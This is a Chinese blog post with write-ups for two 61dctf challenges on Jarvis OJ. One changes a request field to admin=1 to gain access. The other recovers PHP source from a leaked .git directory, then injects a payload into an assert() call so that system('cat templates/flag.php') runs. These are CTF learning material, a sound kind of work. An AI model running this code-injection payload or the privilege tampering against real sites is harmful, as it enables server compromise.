61dctf writeup

最新推荐文章于 2022-07-05 09:45:19 发布
最新推荐文章于 2022-07-05 09:45:19 发布
阅读量2.7k 收藏
点赞数
分类专栏: jarvisoj_writeup 61dctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/quedgee/article/details/78382812
版权

**

admin

**

打开页面发现。。。。就一个Hello World= =,查看源代码也无果,那么抓个包吧= =
这里写图片描述
emmmm,发现什么也没有,那么就robots.txt看看吧,发现果然有东西
web.jarvisoj.com:32792/robots.txt
这里写图片描述
访问这个后发现。。。。flag{hello guest}。。。。嗯。。。被骗了,提交这个没有用
那么在这个页面抓个包,再改一次admin= 1即可
这里写图片描述

**

babyphp

**
查看源码,发现有个hint耶。。。。看来是page传参

<!--<li ><a href="?page=flag">My secrets</a></li> -->

根据提示,有个git,于是想到了.git漏洞
参考博客 http://www.freebuf.com/sectool/66096.html

于是可以导出源码

python GitHack.py web.jarvisoj.com:32798/.git

可以找到index.php中的源代码

<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

看来是个绕过。。。。
构造payload

','..')===False and system('cat templates/flag.php');//

于是就变成了

assert("strpos('"templates/" . ','..')===False and system('cat templates/flag.php');// . ".php"', '..') === false")

把前面的strpos函数给闭合了,调用系统命令查看template目录下的flag.php,再把后面注释掉
flag就出来了,美滋滋啊~~~

quedgee
关注
专栏目录
CRYPTO [61dctf]cry Writeup(RSA已知p的高位攻击)
01-20
[61dctf]cry 题目来源:https://www.jarvisoj.com/challenges Coppersmith攻击:已知p的高位攻击 关键点:用SageMath 恢复RSA完整的p 题目给了源码,其中print如下信息: print ====welcome to cry system==== (p,q...
[xctf]mfw 命令执行&&php语句执行&&assert
qq_37301470的博客
11-21 169
mfw (这有啥含义吗??) 右键查看源码 <!--<li class="active"><a href="?page=flag">My secrets</a></li> --> 得知要读取flag文件内容 提示git 是.git文件泄露 使用githack扫描得出源码 重要源码如下 <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page
2017 某校赛 Writeup
4ct10n
06-25 1849
这次校赛的时候只做了web题 ,。。。。
jarvis OJ WEB题目writeup
weixin_30596735的博客
03-22 780
0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具有公网的计算机去连,我这里用的我的腾讯云服务器去访问的,本地并不能反回正确结果,因为本地私有地址从代理服务器出去后,使用的是代理服务器的端口,这个端口往往不会是51 curl --...
[Jarvis OJ - PWN]——[61dctf]fm
Y_peak的博客
02-17 287
[Jarvis OJ - PWN]——[61dctf]fm 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下, 开启了canary 和NX保护 在IDA中,查看一下, 这是一道格式化字符串的题。 找到x的地址 在pwndbg中进行调试一下, 寻找偏移 from pwn import * #p = remote("pwn2.jarvisoj.com",9895) p = process("./fm") gdb.attach(p
[61dctf]fm
zip471642048的博客
07-05 140
附件地址 : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399在if判断了x的值,但是x的值是我们不可控制的,printf输出了&buf的值,这里是可以进行格式化字符串攻击的,而且if判断的是4 而$n可以输出4的int值到任意的地址中。...
星座图的matlab代码-PastCode:一些过去的代码,用于读取文件和可视化
05-27
在MATLAB中,星座图是一种常用的工具,常用于数字通信领域,用来表示调制后的信号在复平面上的分布情况。星座图可以帮助我们理解和分析不同调制方式(如QPSK、16QAM、64QAM等)的特性。下面我们将详细探讨如何使用...
18°N以北中国滨海滩涂湿地分布数据集(1989-2020).rar
03-20
1. DCTF_China_1999.cpg:1999年中国滩涂湿地的分布情况。 2. DCTF_China_2011.cpg:2011年的滩涂湿地分布数据。 3. DCTF_China_2001.cpg:2001年的情况。 4. DCTF_China_2004.cpg:2004年的数据。 5. DCTF_China_...
1762java校园单车投放系统Myeclipse开发mysql数据库web结构jsp编程servlet计算机网页项目源码
最新发布
04-24
一、源码特点 java校园单车投放管理系统是一套完善的java web... 3、数据库文件名是jspdctf.sql ,系统名称dctf 4、系统首页地址:http://127.0.0.1:8080/dctf/login.jsp 不包含人工调试服务,如果需要联系作者购买
第九届职业院校职业技能大赛“网络安全”项目-决赛试题.docx
12-01
比赛分为四个模块:A基础设施设置与安全加固、B网络安全事件响应、数字取证调查和应用安全、CCTF夺旗-攻击以及DCTF夺旗-防御。每个模块都有不同的权重,总计100%,全面考察参赛者的技能。 【模块A:基础设施设置与...
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2453
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 &lt;?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
【jarvisoj刷题之旅】逆向题目[61dctf]androideasy的writeup
iqiqiya的博客
09-09 715
题目名字androideasy    那么猜测就是一个apk   winhex打开后果然是   改下后缀   载入Androidkiller   直接看java源码      明显可以看出关键就在check()方法     很明显就是一个简单的异或运算 那么我们只要将byte[ ] s的每一个字符与0x17异或即可得到flag Py代码: a = [113...
【jarvisoj刷题之旅】逆向题目[61dctf]stheasy的writeup
iqiqiya的博客
09-09 1032
直接载入IDA 看有没有什么可疑字符串   双击进入 双击进入引用 F5反汇编成c代码 经过分析可以看出sub_8048630()这个方法是关键 双击进入 经过分析   再将一些难看的变量名什么的修改下 就变成下图这个样子 分析可知s就相当于我们想要得到的flag   反过来我们可以通过已经有的a和b这两个数组来得到flag           第一步:求a[...
git源码泄露及php注入——【61dctf】babyphp writeup
Ve99tr’s Blog
09-04 1380
题目链接:http://web.jarvisoj.com:32798/ 描述 进入页面后点击导航栏的About选项 关键点:GIT git源码泄露 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 摘自:https://www.freebuf.com/sectool/66096.html 关于g...
[61dctf] stheasy
Selukwe的博客
04-24 458
题目下载:ctf2.b93676be23733b2fcda3988c1133c1c1 解题思路: 是个 Linux 下的 ELF 文件,拖到 IDA 中分析,定位 main 函数,F5 看代码。 逻辑很简单,先输入 flag,然后重点在 if 语句的判断,也就是 sub_8048630 函数是对 flag 进行检查,双击进去。 s 就是输入的 flag,v1 显然是 flag 的长...
[61dctf]inject
Mikasa
04-19 712
本题考察了Mysql中反引号与不同引号的区别。。 提示有源码。。扫描一下: 看见了index.php~,访问一下,就发现: desc table_name 是用来查询表结构的,例如: 如果要成功,就必须保证此表存在。。 我们也看到了后面的源码。。。需要我们构造Payload,可是Payload也会被带入表中查询。。肯定会出错的。。。 这里面就用到了反引号的作用。。 简单理解 我们...
171127 总结-DCTF线下赛经验教训
whklhhhh的博客
11-28 774
1625-5 王子昂 总结《2017年11月27日》 【连续第423天总结】 A. 上海CTF线下赛总结 B. 准备了许多脚本,但大多数都没有用上 而且规则临时改变太大了(:з」∠)并且含糊不清,比如到场发的纸上写着有3台GameBox,却只给了两个IP,我们都以为要扫剩下的一个,其实是写错了只有两个靶机(╯‵□′)╯︵┻━┻准备了批量SSH弱口令的攻击脚本,然而SSH并不是弱口令╮(╯_
jarvis oj Web By Assassin
Assassin
08-22 8685
LOCALHOST套路题,构造headers中加上x-forwarded-for=127.0.0.1即可 PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}PORT51访问了页面发现让你Please use port 51 to visit this site.明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–l
Jarvis-OJ WEB 多题writeup
烟敛寒林的博客
04-19 4349
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格S...
matlab dctf
10-09
DCTF是一种离散余弦变换,常用于信号和图像的压缩、降噪等方面。在Matlab中可以使用dct2函数进行二维离散余弦变换。 示例代码: ``` img = imread('lena.jpg'); img = im2double(img); % 转换为双精度型 dct_img = dct2(img); % 进行二维离散余弦变换 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值